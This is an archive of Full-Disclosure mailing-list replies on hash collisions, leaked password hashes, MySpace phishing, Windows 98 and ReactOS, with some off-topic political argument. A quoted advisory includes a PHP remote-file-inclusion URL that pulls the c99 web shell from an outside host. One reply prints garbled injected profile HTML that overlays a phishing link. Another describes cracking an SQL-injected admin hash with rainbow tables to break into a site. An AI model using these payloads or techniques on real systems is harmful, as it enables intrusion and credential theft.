unless your string of bits is *also* a chunk of English text, that reads
as
if I wrote it.  So not only do you need to be able to collide a specific
hash, you need to do so with at least *some* control over the content of
the text, which is even harder.



Well you could add some garbage at the end of the message. In a text message
would call attention that something is wrong (maybe because is signed and
you would not be able to tell if the key holder signed a text with that
garbage at the end or somewhere else), but not on binary content for example
a driver or an executable image that simply skips the "garbage" that causes
the collision when executed. Although a weakness will be of help to
accomplish this, making the attack to take less time. However if the attack
takes let's say 10 000 years instead of 1000 000 is well... almost the same
thing.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-24 Thread wac

Of course not, is enough to find a collision and you'll get for example a
message signed by somebody else that looks completely authentic since
signatures encrypt that hash with the private key.

On 3/21/07, Blue Boar <[EMAIL PROTECTED]> wrote:


3APA3A wrote:
> First,  by  reading  'crack'  I thought lady can recover full message by
> it's signature. After careful reading she can bruteforce collisions 2000
> times faster.

Cracking a hash would never mean recovering the full original message,
except for possibly messages that were smaller than the number of bits
in the hash value. There are an infinite number of messages that all
hash to the same value.

The best crack you can have for a hash is to be able collide with an
existing hash value and be able to choose most of the message contents.

BB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wikipedia and Pedophilia

2007-01-23 Thread wac

On 1/20/07, Timo Schoeler <[EMAIL PROTECTED]> wrote:


In epistula a V Vendetta <[EMAIL PROTECTED]> die horaque Fri, 19
Jan 2007 13:29:53 -0800 (PST):

> Full Dislosure: Wikipedia
>
(...)
>
> Also, I apologize for my english - as it is only my second language.
>
> The Wikipedia ideology is like communism - all the people working
> together in harmony - it sounds like... Peace.  It's idealism at its
> highest level.
>

no, the wikipedia ideology is NOT like communism. i even doubt they
have something like an ideology.

however, you should also apologize for your ranting about something
(communism) you don't even know the basics of (i.e., it's definition).

your superior system of capitalism destroys the planet for long time
now. at least, we're getting at an end as climate change (carbon
dioxide, methan, etc.) leads to mass extinctions within the next two
decades (at a maxmimum) due to 'the weather being reconfigured around
the planet'.



I beleive that doesn't have anything to do with capitalism or whatever
social system. Is about not using the right developement politics that's
quite different.

so in future those who cause this won't be able to satisfy their needs

on burgers, hot dogs etc., thus not being able to drive their SUVs.
nature will win :)



You wanna be natural? Fine dress yourself  with some  animal skins(or maybe
stay naked) do no take baths do not shave yourself  and live till you get 30
years in cave eating roots you find somewhere or jeje killing animals and
you will be quite natural. Ahh and forget about internet and computers
because in the first place you won't have electricity, that is quite
artificial. Ahh and forget about medicines they are man made.

most interesting, alas Cuba is on its way to communism (no, it is no

communism there, this is socialism, the first step to)



Sure they are doing quite well. I beleive you are talking about something
you don't know. Have you ever been there? because I do

is the only

country with sustainable development (*although* the US put an embargo
on them *decades* ago):



And you still beleive those lies from the government? Ahh come on you eate
the cake. Have ever heard of some government that does't twist the truth?

http://www.panda.org/news_facts/publications/key_publications/living_planet_report/index.cfm


capitalism is about exponential, endless growth;



I beleive that's the natural way of growing things. After all that's what is
civilization about otherwise we were only small tribes trying to not die of
hunger instead of having a society.

the physician will say

that this is not possible because the universe is not endless.



Hmm I beleive you have to read some more about that. Anyway in case it is
not infinite is so huge (I believe you still don't understand how much, is
like our entire galaxy is a little grain of sand on a beach, in fact less
than that) that you can assume it is for the next hmm... billions of bilions
of years to come. And that things they say about energy and oil... Jaj the
Sun is there wasting millions of megawatts every second throwing them to the
space and you all talk about some stupid oil or carbon that is going to
reach its end by some X year instead putting all of your efforts into
finding ways to get that energy shining in front of your face. And then if
the Sun becomes dead some day then there are billions of other stars out
there. As said Einstein "there are two infinite things, the universe and
human stupidity"  So in my opinion is a very stupid idea that one of stoping
developement with such excuses.

the

doctor will tell you that the only thing that achieves this is:
cancer. (which, as capitalism, is its own murderer :)

>
(...)
>
> V

haef phun,

t. <- at least anticapitalist and still waiting for a _single_
democracy that works as the definition says.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Grab a myspace credential

2007-01-16 Thread wac

On 1/16/07, Deepan <[EMAIL PROTECTED]> wrote:


On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
> "but at some point all this abuse will likely start sending users off
> to another service. "
>
> thats only --if the know if they are being abused.. most of them are
> not coherent about any such issues..
>
>
>
> On 1/15/07, Kevin Pawloski <[EMAIL PROTECTED]> wrote:
> The level of phishing sites targeting MySpace and bot related
It is not quiet easy to fool 56000+ users using phishing sites. I wonder
how Mark is doing it.




Hmm... Oh no is very easy, yes very easy what he is doing. He left some
traces on some of the "cracked" accounts, I was expectig of somebody to
comment earlier since I've been a couple of hours since the initial post.

When you modify a profile you can add this to the data of the profile, you
know those HTML customizations. I found this on one of the accounts that
really got my attention a little bit more than the girl of the account :P

HOLAhttp://marcolano.com/login/";>http://x.myspace.com/images/clear.gif";>http://marcolano.com/login/";>http://x.myspace.com/images/clear.gif";>http://www.../mov/cid_3277_f.mov"; width="1" height="1">

As you might see, this creates a huge invisible link in the page in front of
everything, so when you click into anything on the page like a link or
anything it will take you to that phising website so ppl beleive that the
account expired and enter their user+pass. Now I beleive that his message
was a way to tell about a BUG in myspace that should filter that content and
it is not doing it. So... we are in fact not talking about a stupid phishing
website for those who still beleive that.

Regards
Waldo



 activity that has been targeting MySpace lately is pretty
> alarming. Granted there is no real financial risk if an
> account gets compromised for the user but at some point all
> this abuse will likely start sending users off to another
> service.
>
> Kevin
>
>
> On 1/15/07, North, Quinn <[EMAIL PROTECTED]> wrote:
> "[EMAIL PROTECTED]
:doyouhonestlythinkiwillputmyrealpass
> wordhere"
>
> ...at least there is some hope left in the world :-\
>
> --=Q=--
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On
> Behalf Of Emma
> Perdue
> Sent: Monday, January 15, 2007 7:48 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Grab a myspace credential
>
> 56000+ and counting
>
> http://www.marcolano.com/login/myspace.txt
>
> --
> *Emma aka TINK*
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
---
Regards
Deepan Chakravarthy N
http://www.codeshepherd.com/
http://sudoku-solver.net/

I am a programmer by day,
I dig grave for other programmers by night.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure

2007-01-15 Thread wac

On 1/8/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:


On Sun, 07 Jan 2007 16:08:23 +0100, endrazine said:

> > yes that's correct but don't forget that hashes can collide
> >
> > it could be the case that:
> >
> can ? could ? might ? Do you have any mathematical prouve or are you
> just guessing ?

It's a pretty easy proof actually.  If your password input routine allows
more different passwords than there are possible hashes, you *will* have
collisions.  For instance, if you use a 64-bit hash, and reasonable-length
passwords, you can create more than 2**64 of them, and 2 *have* to
collide.



right


> xhash("$Up3$tr0n9 # [EMAIL PROTECTED]") == xhash("1234") and you don't even
> > need the original strong one ;)
> what hashing algorithm is being use ? Is a collision realistic ? How
> much time would it take to actually break a given hash ?

If you're using anything resembling a sane hash (such as MD5 or similar),
what happens is that you basically ignore the hash collisions - because
rather than "1234", your colliding password/phrase is probably a 32-byte
or so
string, which is likely not even enterable at the keyboard (it ends up
being
A # ctl-b 9 e alt-control-meta-$ etcetc - of the 32, likely only 10 or so
of the characters are from the 96-char printable ASCII set, and there's a
good
chance that at least several of the bytes are ones you can't enter from
the
keyboard at all)



Well I think you should not ignore those collisions, in some cases binary
data could be entered as a password for example when sent over the network
so... do not count on having to type it on a keyboard machines can do that
for you ;).

BTW for that still do not beleive this bug is a BIG hole well... as an
example a friend of mine broke into a website about 2 days ago "reversing"
an MD5 hash. Using a similar bug in one of those php instant website
creation tools that disclosed the administrator password hash using some
sort of SQL injection. He was using a program similar to John the Ripper and
asked me for help since that was taking very long and he had no idea about
rainbow tables. I simply told him to use one of those online Rainbow tables
an the thing ended taking only a couple of minutes. And he was only learning
about SQL injection and was only one hash that popped when you typed in your
browser some sort of URL containing that SQL stuff. No imagine when you have
the whole database. No... is not BIG, is HUGE.

___

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure

2007-01-07 Thread wac

On 1/5/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:


On Fri, 05 Jan 2007 15:34:49 EST, T Biehn said:
> This isn't a password disclosure, it's a leak of password information.
>
> It's a password hash, you super hacker.

And given the hash, and knowledge of how the hash is computed, it becomes
possible to dictionary-attack (and other related techniques), and thus
get the actual passwords, unless there are other things in place to ensure
that all users have passwords sufficiently strong to resist those
techniques.



yes that's correct but don't forget that hashes can collide

it could be the case that:

xhash("$Up3$tr0n9 # [EMAIL PROTECTED]") == xhash("1234") and you don't even need
the original strong one ;)

so strong password is not a countermesure to that

I beleive that is a BIG security hole

Regards
Waldo

And given that this:


> http://remote_server/data/users.0.dat

works, the probability that the hashes represent strong passwords is quite
close to nil.

In any *practical* sense, the fact that the attacker can get the hash and
from that extract/compute at least some passwords means that the passwords
are *effectively* disclosed, even if the actual bitstring originally
retrieved
isn't the actual password.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

2006-10-18 Thread wac
Thanks. But don´t worry I won´t read sh... anyway :) Nothing interesting could come from that hitman anyway.RegardsWACOn 10/16/06, 
Pink Hat <[EMAIL PROTECTED]> wrote:
On 10/16/06, wac <[EMAIL PROTECTED]> wrote:> Hey you could start by writing those sites in english :P>
http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8Not perfect but readable... I guess...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

2006-10-16 Thread wac
Hey you could start by writing those sites in english :POn 10/13/06, hitham hitham <[EMAIL PROTECTED]
> wrote:===# Found By Sp1deR_NeT ..
# E-mail :- [EMAIL PROTECTED]# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com
# We Are :- PalEstine  HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )*Script :- PHP rojekt5.1.1-Code Vuln :-$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)In File :- editor_big.php-Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?Example :- 
www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?-
[EMAIL PROTECTED]Sp1deR_NeT  ^__^===_
Be the first to hear what's new at MSN - sign up to our free newsletters!http://www.msn.co.uk/newsletters___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Server Redundancy

2006-08-12 Thread wac
Hi:Thanks I'll check ipvs.RegardsWaldoOn 8/10/06, Tim Hecktor <
[EMAIL PROTECTED]> wrote:




Hello,
 
> DiG 9.2.1 <<>> 
ftp.freenet.de;; global options:  
printcmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: 
NOERROR, id: 59136;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 3, 
ADDITIONAL: 3
 
;; QUESTION 
SECTION:;ftp.freenet.de.    
IN  A
 
;; ANSWER SECTION:ftp.freenet.de
. 
1457    IN  CNAME   
ftp-0.freenet.de.
ftp-0.freenet.de.   
600 IN  
A   
194.97.2.69
ftp-0.freenet.de.   
600 IN  
A   
194.97.2.70
ftp-0.freenet.de.   
600 IN  
A   
194.97.2.67
ftp-0.freenet.de.   
600 IN  
A   194.97.2.68 
 
This will map a name to more than one ip and will give you 
load-balancing this way, but not real redundancy.
To map a service to different hosts redundant you can use a 
box running ipvs. This box can be made redundant with a identical box using 
mon and heartbeat to do ip failover.
 
Best regards,

Tim Hecktor 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Server Redundancy

2006-08-10 Thread wac
Hi:Isn't there a way to map a name to several IPs?Or use aliases?I'm interested in the subject because I want to do the same thing.RegardsWaldoOn 8/9/06, 
Gary E. Miller <[EMAIL PROTECTED]> wrote:-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1Yo Sec!On Wed, 9 Aug 2006, Sec Bas wrote:> I was thinking about doing this with Dynamic> DNS and using rsync to replicate changes.Dynamic DNS will not provide the response you are looking for.  Many
browsers cache DNS for 30 mins or more regardless of your TTL.  ManyISPs cache DNS for a day or two regardless of your TTL.  My expererienceis that it takes up to 2 days before a DNS change fully propogates even
with a TTL of 5 mins.  In some pathological cases I have seen it take 6months.RGDSGARY- ---Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED]  Tel:+1(541)382-8588-BEGIN PGP SIGNATURE-Version: GnuPG v1.4.3 (GNU/Linux)iD8DBQFE2oNg8KZibdeR3qURArlxAJ49KBVwNqLDrDPkUzjvg0FmzIKt1gCg4AMb
72lChX0rNrr+zyVeH72SR58==b2wW-END PGP SIGNATURE-___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gmail emails issue

2006-08-05 Thread wac
Hi:Worried about a temp file in gmail servers and not by the fact that using a browser your mails goes who knows where server in plain text? Except for the login part that uses SSL of course. Somebody could be sniffing :D
regardsWACOn 8/4/06, 6ackpace <[EMAIL PROTECTED]> wrote:
Hi All,
 
Gmail stores mails in Temp folder for faster access.but i have observer it fails to remove mail from   the temp files after the session is ended.
 
any user who has access physical access to the system can read mail and contact information of the Gmail user.
 
Discloses information which is private and confidential?
 
thank you
 
ratna
 

___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 70 million computers are using Windows 98 right now

2006-08-03 Thread wac
On 8/1/06, Eliah Kagan <[EMAIL PROTECTED]> wrote:
On 7/27/06, wac wrote:> > >  Now, Linux is definitely not a natural migration pathway. That theory> of> > > adapting server oriented operating systems to the desktop, and believe> if
> > > was going to be a succes has proven to be wrong.> >> > Really? Windows 2000, Windows XP, and Mac OS X seem to work pretty> > well for novice users...>>> Sorry I don't get the point here.
>> > Or are you belaboring the misguided claim that Linux is fundamentally> > a server-based system but that Windows NT is not?>>> There was Windows NT workstation ;). With windows was the other way. From
> desktop to server. Of course you can change Linux so much that it won't be> Linux anymore. Definitely putting an X server on top of unix won't make it> ready for desktop, that's a fact.Are you honestly claiming that Windows NT Server has a nonintuitive
user interface and yet Windows NT Workstation has an intuitive userinterface? (Or was that a joke?) They are the same operating systemexcept for additional executables and registry tweaks. 
Of course not, they are almost the same. Hey! take a look at winNT 4.0 resources in explorer some bitmaps say windows NT server, workstation and there was a 3rd one, I don't remember very well. I don't even consider windows OS server oriented at all (that is why I mentioned the workstation thing if interested). I can say then something similar. Adapting desktop oriented OS to server ...  And yes numbers proof that. Anyway I guess is a problem of selling more or having it installed on more computers. But then that's not my problem. Mine and many others are having their problems solved. And yes I can tell you a couple of stories about that. I have some windows servers. And guess what. I'm praying for a linux/freebsd or whatever *nix you can name. But then the persons across the sea just can't install that. Then I guess that would give you an answer about the installer interfaces you talk later. No, they just can't intall a Linux at all, and beleive me, I tried hard to make that happen. Imagine a FreeBSD or something else. My only chances would have been for example to use some virtualization software and install other OS in some partition and then pray that a boot loader installer from windows would wake up correctly the other OS. As you can see that was a big IF we were not ready to take. Anyway I was left without choices and now the software those servers run had to be built on top of Windows. Well IOCompletionsPorts work OK as long as the non paged pool doesn't drains out when the number of opened sockets goes too high. Yes even with the registry hack to increase its size. Also the use of windows for example included having to install a comercial SSH software instead of OpennSSH (no the cywin port was not ok, it hanged the server sometimes because of it's emulation created a process for every user logged in). Ohh yes we are talking about real money here. Beleive me I really prayed for a damn good user friendly installer once.
When you said,"server-based" I thought you meant "designed for enterprise
client-server situations." If you mean "designed to be usedexclusively on a dedicated server box operated by a technicallylearned network administrator" then (by definition) no general purpose
operating system (be it Windows, Linux, FreeBSD, OpenBSD, NetBSD, orany other) is server-based. Saying that noobs can't use Linux doesn'tmake it so. FreeBSD is a particular general purpose operating systemthat is perhaps almost exclusively used by people who know well what
they are doing (or are willing to put in the time and effort tolearn)--and Mac OS X is based on FreeBSD. (To be fair, some elementsare based on NeXTstep, which is another operating system used almostexclusvely by the technically inclined.) 
This notion that you can'ttake an operating system that has been traditionally hard to use and
make it easier is senslessly defeatist and unsupported by evidence,though it may be partially self-fulfilling.Ok where is that evidence? MacOS X is not a good example when you have little choices you can make. What would you intall in a mac instead? Linux? Then I guess we have the same situation here. But also keep in mind that the only thing that Mc X got from freebsd was the kernel. Anyway I'm not an expert here so I guess that I can't talk very much about the subject. So far I see that Windows is more used on the desktop than any other OS and yet you have to pay for the license (or violate it) and all the rest of the sh.. we all know. And now some Macs have intel inside. Are we going to see the Apple selling Wintel too in the future? Maybe, when they realize that they are probably going to sell more computers.
As an aside, if you're saying that Win

Re: [Full-disclosure] 70 million computers are using Windows 98 right now

2006-07-26 Thread wac
On 7/26/06, Eliah Kagan <[EMAIL PROTECTED]> wrote:
Waldo--> It will run  everything  (almost) that runs on top of a win32> subsystem...(the top bar is higer actullay, it goes for native java, native> linux, native DOS, OS2 etc.. is a long list) and drivers as well, enought
> for migration ;). Anyway you take it if you want, is free to try :D.It aims to run everything that runs on top of a win32 subsystem andmore, and it will probably succeed. I am very happy about the ReactOS
project--but I think it's important to realize the difference betweenwhat an OS will be and what it is now. In the context of security,Windows 98's developers are no longer committed to security forWindows 98 (even to the degree to which they were before), and
ReactOS's developers *cannot* be committed to security for ReactOSbecause ReactOS is not stable--i.e. the developers do not classify itas stable, i.e. the developers are perfectly willing to have bad,insecure code in the system for an extended period of time if doing so
is most conducive to development.> It is> even smaller than 98 and will work with 32 Mb of RAM (maybe less in the> future, some ppl are already testing at 8 MB hey that's better than even
> win 95 and is a full NT Box WOW I beleive M$ make some millions to spend a> couple of dollars in memory chips!!).It was really, really small the day before the first line of code waswritten. It was pretty small after the first hundred lines of code
were written. In it's still incomplete state, it is no surprise thatit is still smaller than a complete operating system to which iteventually is slated to contain comparable functionality in most orall areas.
It is more complete than incomplete ;) If someone can ever say that a software is complete. But ceirtanly there is not much missing. I would say that it is about 70-80 %. Of course what's left are the most hard to do parts beacause being Windows so closed there are still many obscure points that needs to be clarified.
I may be misremembering, but I'm pretty sure that my old 75MHz P1no-MMX Packard Bell box had 8MB of RAM when I put Windows 98 on it
(due to the other 8MB not being properly seated in the RAM slots atthe factory...ah Packard Bell, brings back memories...). Windows 98crashed a lot, but it didn't crash any more often than I've heard itcrashes on just about any box, due to it being Windows 98.
What is cool is that ReactOS can be run, more or less, with 8MB ofRAM, and ReactOS is an *NT* style system--I wouldn't attempt that withWindows NT 4.0. I've never used any version of NT before 4.0, and I
don't know what their memory footprints were. Perhaps they were less. I beleive you can wake up NT 4.0 with a minimun of 16 Mb. I could give it a try with some virtualization software to figure out but is not one of my priorities right now. Anyway it will run on a machine where windows 98 runs. It's hardware requirements are equal or lower.
> Today linux distros take 128 Mb or> more to run decently. So IMHO it is a replacement candidate for some
> situations already.You have a good point--it may be a reasonable replacement candidatefor Windows 95/98/ME systems **where a guarantee of security being apriority, from the vendor, is not required**. This implies that the
user knows enough about security to manage the risk that the vendor isnot managing. A guarantee of security from the vendor may nottranslate into actual security, but it does translate into securityprofessionals getting pissed off and vocal when actual security is not
delivered.I doubt ReactOS is a good replacement candidate for a Linux system--ifmemory is the primary concern, OpenBSD or a small Debian system withthe kernel rebuilt sans unnecessary code would be a better option. If
a working Linux or other POSIX-like API is implemented as a subsystemthen it might be a reasonable replacement for Linux and/or other *nixsystems.No,  of course not.  Not even a fully working windows is a replacement at all for linux in most situations. Anyway if we put the linux+wine+ndiswrapper the memory footprint of that configuration is probably high. You could be righ here, I have not seen the memory requirements of those configurations.
>  Now, Linux is definitely not a natural migration pathway. That theory of
> adapting server oriented operating systems to the desktop, and believe if> was going to be a succes has proven to be wrong.Really? Windows 2000, Windows XP, and Mac OS X seem to work prettywell for novice users...
Sorry I don't get the point here.Or are you belaboring the misguided claim that Linux is fundamentally
a server-based system but that Windows NT is not?There was Windows NT workstation ;). With windows was the other way. From desktop to server. Of course you can change Linux so much that it won't be Linux anymore. Definitely putting an X server on top of unix won't make it ready for desktop, that's a fact.
> I wonder if mi parents> will manage someday to even install it :D. (yes I'm making a constructive
> cri

Re: [Full-disclosure] 70 million computers are using Windows 98 right now

2006-07-22 Thread wac
On 7/11/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]
> wrote:On Tue, 11 Jul 2006 13:28:08 -0300, Cardoso said:> but I agree. Let them die. 98 is a very unsafe plataform, hope the
> spyware guys act fast and kill all the remaining machines, under a ton> of popups.And where does that leave the users?  Have you considered that maybe someof them are still using Win98 because they don't have a realistic upgrade
path?  WinXP may not install on their box, or run adequately - and justtelling them to upgrade isn't always an option.  There's large parts of theworld where a discarded box running Win98 is affordable, but a new box
and a legal copy of XP is just out of the question.Phrased differently - how would *you* feel if *your* platform was the targetof the sort of attack you're advocating against Win98?
I would use ReactOS in that case ;) --->  www.reactos.com The alpha 0.3.0 rc1 is already there waiting for the download yep an alpha but then that is what win98 always was, a badly designed alpha putted on the market with rush to produce money at the expense of a lot of data destruction. Fortunately later m$ paid that with some degreee of credibility loss. Anyway if an alpha is not enought for you the MAKE IT BETA ;) you have the sourcecode ready to play with.
RegardsWaldo___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-14 Thread wac
Hi folks:Can I get this file somewhere else? Like a web site or something. This gmail thing detects it as a virus. I doub't yahoo will let it pass still, that's wht i don;t ask anyne to send it to me ;). I wonder who asked to have an stupid scanner in the e-mail that you can't disable. I don't even have one on my computer!!! Anyway I understand I'm not common kind of people ;). Thanx in advance.
WaldoOn 6/12/06, David Loyall <[EMAIL PROTECTED]> wrote:
Hello, all.I just received an email with an html attachment, on a yahoo account.When I opened the mail, yahoo automatically displayed the html, and executed the code within.  What the hell. =)  It forwarded the message to my contacts list, (or some other set of addresses, dunno,) and redirected my browser to a website.
I'm of to a BBQ, and I don't care about yahoo.  So I'm not even going to read the code and see how this happens.  I'm attaching the html file as a text file.  Enjoy!
 
Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful.
 
Cheers,
--David LoyallOmaha, NebraskaDavid Loyall

___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-28 Thread wac
Jejej no Way, That would be the only thing that will make me to remove the bookmark from my browser. Anyway there are a couple of some other sites that give those files for free so we won't loose anything :D We'll simply change the provider.
RegardsWaldoOn 3/16/06, Ivan . <[EMAIL PROTECTED]> wrote:
http://www.eweek.com/article2/0,1895,1938511,00.asp___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Phun! Search

2006-03-23 Thread wac
LOL jajajajajajOn 3/21/06, Javor Ninov <[EMAIL PROTECTED]> wrote:
i hope you soon reach 18 and start thinking about sex... you will likeit i am suren3td3v wrote:> \/\/3 53nd j00 m4d c0d35> ch3x j00r 1nb0x3r ph0r Xpl01t c0d3 2 m4n1pul4t3 phUN! s34rch> h0h0h0
>> On 3/21/06, *teh kids* <[EMAIL PROTECTED]> [EMAIL PROTECTED]>> wrote:>
> G00d W0Rk,>> i7 533m5 tHaT u ArE pu77ing Y0Ur 3x7r@ ChR0M050M3 70 g00D u53>> XxX>> On 3/21/06, n3td3v < [EMAIL PROTECTED]
 [EMAIL PROTECTED]>> wrote:> >> >> > Vendor: Yahoo! Inc.> >> > Service: Yahoo! Search.> >
> > Description: Phun! Search indexes millions of documents, including> its own> > user accounts.> >> > Concept:> >> 
http://66.218.69.11/search/cache?ei=UTF-8&p=n3td3v&fr=sfp&u=mtf.news.yahoo.com/mailto%3Furl%3Dhttp%253A//e.my.yahoo.com/config/cstore%253F.opt%3Dcontent%2526.node%3D1%2526.sid%3D171771%26title%3DChoose+Content%26prop%3Dmycstore%26locale%3Dus%26h1%3Dymessenger+at+Yahoo%21+Groups%26h2%3Dn3td3v%26h3%3Dhttp%253A//my.yahoo.com&w=n3td3v&d=U5wy1m1aMbOe&icp=1&.intl=us
> <
http://66.218.69.11/search/cache?ei=UTF-8&p=n3td3v&fr=sfp&u=mtf.news.yahoo.com/mailto%3Furl%3Dhttp%253A//e.my.yahoo.com/config/cstore%253F.opt%3Dcontent%2526.node%3D1%2526.sid%3D171771%26title%3DChoose+Content%26prop%3Dmycstore%26locale%3Dus%26h1%3Dymessenger+at+Yahoo%21+Groups%26h2%3Dn3td3v%26h3%3Dhttp%253A//my.yahoo.com&w=n3td3v&d=U5wy1m1aMbOe&icp=1&.intl=us
>> >> > Remark: "Yahoo! is not affiliated with the authors of this page or> > responsible for its content." :-)> >> > Thank: n3td3v.
> >> > Greet: Yahoo! core security team.> >> >> >> > ___> > Full-Disclosure - We believe in it.
> > Charter:> > http://lists.grok.org.uk/full-disclosure-charter.html> <
http://lists.grok.org.uk/full-disclosure-charter.html>> > Hosted and sponsored by Secunia - http://secunia.com/> > >> > >> ___> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/
___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: what we REALLY learned from WMF

2006-01-12 Thread wac
Hi:I think it would be good if Microsoft releases patches a la opensource. But I think since M$ does the whole thing is their decision after all to do it one way or another. I understand that sometimes is a matter that customers have no other choice than take things as they decide. The normal answer would be fine don't use my systems and they would be right on the other side you can't stop using their systems. Ahhh but then there are other ppl that realized the whole trick and started to take action since 1995 and will let you take action too ;). Take a look at this website [ 
http://www.reactos.com ] and start to taste our freedom in an alpha stage but close to beta. And yes I hope to get an avalanche with this since I'm tired of huge downloads, tons of closed information huge amounts of non documented stuff, licensisng issues, limits on the number of connections no more RAW sockets and a tons of more stuff that makes a big chain in my neck and tons of other more ppl. Some of this chains were set up even before I was born. So I guess that I as a number of more ppl really had no chances. I expect to break them some day and surely not alone. In that case I could say that maybe I really was alive and in this world.
RegardsWaldoOn 1/6/06, [EMAIL PROTECTED] <
[EMAIL PROTECTED]> wrote:Gadi Evron <
